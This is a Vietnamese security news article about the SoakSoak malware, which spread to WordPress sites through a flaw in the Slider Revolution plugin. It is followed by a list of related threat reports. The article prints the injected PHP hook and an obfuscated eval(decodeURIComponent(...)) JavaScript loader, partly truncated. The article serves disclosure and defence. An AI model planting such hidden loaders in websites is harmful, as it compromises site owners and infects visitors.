Trong nỗ lực cố gắng kiểm soát sự lây nhiễm mã độc, Google cũng đưa ra danh sách hơn 11.000 tên miền được cho là đã bị nhiễm. Tuy nhiên, đây có thể chỉ là một phần nhỏ các trang bị lây nhiễm và chưa thể đánh giá chính xác con số thực tế. Vì hiện nay có hơn 70 triệu website đang sử dụng nền tảng Wordpress, từ các blog cá nhân cho đến các hãng tin lớn như Time.com.
Theo hãng bảo mật Sucuri việc lây nhiễm mã độc được thực hiện thông qua một lỗ hổng bảo mật từ plugin của bên thứ 3 phát triển dưới tên gọi Slider Revolution - một plugin hỗ trợ việc trình chiếu ảnh miễn phí. Khi một trang web sử dụng nền tảng WordPress bị nhiễm mã độc, các tin tặc có thể nắm quyền điều khiển biến trang web đó thành công cụ tấn công các trang web khác hoặc lây nhiễm mã độc cho người dùng.
<?php function FuncQueueObject() { wp_enqueue_script("swfobject"); } add_action("wp_enqueue_scripts", 'FuncQueueObject'); |
eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D% 27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E% 61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D% 0A%29%3B")); |
Hãng bảo mật Sucuri đã cung cấp một trang quét trực tuyến miễn phí http://sitecheck.sucuri.net/ giúp kiểm tra các trang web có bị lây nhiễm mã độc SoakSoak hay không.
Nếu trang web đã bị nhiễm mã độc, người quản trị cần gỡ bỏ các đoạn mã độc hại và khôi phục lại các tệp tin an toàn. Tuy nhiên, nếu hệ thống website có sử dụng hệ thống Firewall Website, CloudProxy thì website đó được bảo vệ khỏi mã độc SoakSoak.
14:34 | 04/09/2009
15:34 | 04/10/2007
15:34 | 04/04/2007
15:34 | 04/04/2007
14:00 | 01/03/2024
Các nhà nghiên cứu của hãng bảo mật Trend Micro phát hiện các tác nhân đe dọa Water Curupira (một nhánh của nhóm tin tặc Black Basta) đang triển khai chiến dịch phân phối phần mềm độc hại PikaBot như một phần của chiến dịch email spam trong suốt năm 2023 vừa qua. Bài viết này sẽ phân tích hoạt động tấn công trong chiến dịch PikaBot cùng khuyến nghị về các biện pháp phòng tránh trước các mối đe dọa lừa đảo này.
08:00 | 10/02/2024
Các nhà nghiên cứu an ninh mạng của hãng bảo mật Fortinet (Mỹ) đã xác định được các gói độc hại trên kho lưu trữ Python Package Index (PyPI) mã nguồn mở nhằm phân phối phần mềm độc hại đánh cắp thông tin có tên là WhiteSnake trên hệ thống Windows. Bài viết này tập trung phân tích một số payload trên các gói trong kho lưu trữ PyPI.
11:00 | 25/01/2024
Chiến dịch phát tán phần mềm độc hại Phemedrone (chiến dịch Phemedrone) thực hiện khai thác lỗ hổng Microsoft Defender SmartScreen (CVE-2023-36025) để bỏ qua cảnh báo bảo mật của Windows khi mở tệp URL.
13:00 | 23/01/2024
Các nhà cung cấp dịch vụ viễn thông, truyền thông, Internet (ISP), nhà cung cấp dịch vụ công nghệ thông tin và các trang web của người Kurd ở Hà Lan đã trở thành mục tiêu của một chiến dịch gián điệp mạng mới do nhóm tin tặc có tên gọi là Sea Turtle thực hiện. Nhóm này hoạt động với động cơ chính trị nhằm thu thập thông tin tình báo phù hợp với những lợi ích của Thổ Nhĩ Kỳ. Bài viết này sẽ cùng phân tích về các hoạt động của nhóm tin tặc này và các kỹ thuật trong chiến dịch mới nhất, dựa trên báo cáo điều tra của công ty an ninh mạng Hunt&Hackett (Hà Lan).
Microsoft đã phát hiện ra một lỗ hổng nghiêm trọng có tên là Dirty Stream đe dọa các ứng dụng Android phổ biến.
14:00 | 17/05/2024